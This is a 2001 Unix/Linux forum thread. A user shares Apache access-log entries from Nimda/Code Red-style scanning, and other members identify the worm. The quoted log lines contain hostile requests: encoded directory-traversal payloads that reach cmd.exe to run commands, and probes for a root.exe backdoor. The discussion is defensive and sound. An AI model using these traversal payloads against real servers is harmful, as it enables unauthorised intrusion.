/var/log/httpd/access_log | Unix Linux Forums | Security

  Go Back    


Security Discuss UNIX and Linux computer and network security, cyber security, cyber attacks, IT security, and more.

/var/log/httpd/access_log

Security


Closed Thread    
 
Thread Tools Search this Thread Display Modes
    #1  
Old 10-01-2001
eddie eddie is offline
Registered User
 
Join Date: Aug 2001
Last Activity: 25 December 2002, 9:33 PM EST
Location: Ontario, Canada
Posts: 20
Thanks: 0
Thanked 0 Times in 0 Posts
Computer /var/log/httpd/access_log

Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these,

209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265

Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the log of the past 3 months, there are about 200 tries of this kind from various ranges of IP address.

I think this is apparently virus attack. Has anybody here ever found such log? I just dial-up to the Internet and the connection lasted for about 30 minutes and I got this attack. I would keep my httpd closed. Thank god, my system is Linux, not NT.

Last edited by eddie; 10-01-2001 at 06:50 PM..
Sponsored Links
    #2  
Old 10-01-2001
Neo's Avatar
Neo Neo is online now Forum Staff  
Administrator
 
Join Date: Sep 2000
Last Activity: 30 October 2014, 12:26 PM EDT
Location: Asia pacific region
Posts: 13,023
Thanks: 522
Thanked 877 Times in 402 Posts
This is like the nimda virus, or its variant. The world has been getting hammered by it for some time. However, since we are !NT , no problem, just an annoyance.

This link might be interesting to read:

http://www.net-security.org/text/pre...9,63447,.shtml

This is also a good link:

http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
Sponsored Links
    #3  
Old 10-01-2001
loadc loadc is offline
Registered User
 
Join Date: Sep 2001
Last Activity: 16 December 2002, 4:51 PM EST
Posts: 40
Thanks: 0
Thanked 0 Times in 0 Posts
Nimda@home, the search for intelligence on the internet

If you've got some spare processor lying around and the bandwidth to go with it, there are some scripts out there that will scan your logs, take the ips of the infected scanners, and resolve them, and tehn send off a mail to their ISP or whoever, and inform them of the machine's condition.....




loadc
    #4  
Old 10-02-2001
LivinFree's Avatar
LivinFree LivinFree is offline Forum Advisor  
Goober Extraordinaire
 
Join Date: Jul 2001
Last Activity: 16 June 2011, 4:50 PM EDT
Location: Portland, OR, USA
Posts: 1,626
Thanks: 2
Thanked 15 Times in 13 Posts
Yeah, those logs could be not only Nimda, but a "code Red" variant, or somebody scanning like heck trying to break into a server that code red already rooted. If they're from similar ( or the same ) IP address, it's most likely somebody in your subnet affected - I think Nimda only scans the 16 address above and below theirs (I may be confusing this with another worm, though).
Sponsored Links
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

More UNIX and Linux Forum Topics You Might Find Helpful
Thread Thread Starter Forum Replies Last Post
Finding IP info from access_log file bugenhagen_ Linux 4 12-07-2011 09:53 PM
Include CFTOKEN and CFID in apache access_log linuxgeek Web Programming 0 06-17-2010 05:39 AM
how to grep or egrep pattern of apache access_log file lamoul Solaris 2 05-06-2009 09:21 PM
Deleting access_log.processed in crontab chickenhouse UNIX for Dummies Questions & Answers 4 07-01-2008 10:19 PM
mail access_log dayglow UNIX for Dummies Questions & Answers 3 11-27-2001 08:01 AM



All times are GMT -4. The time now is 12:41 PM.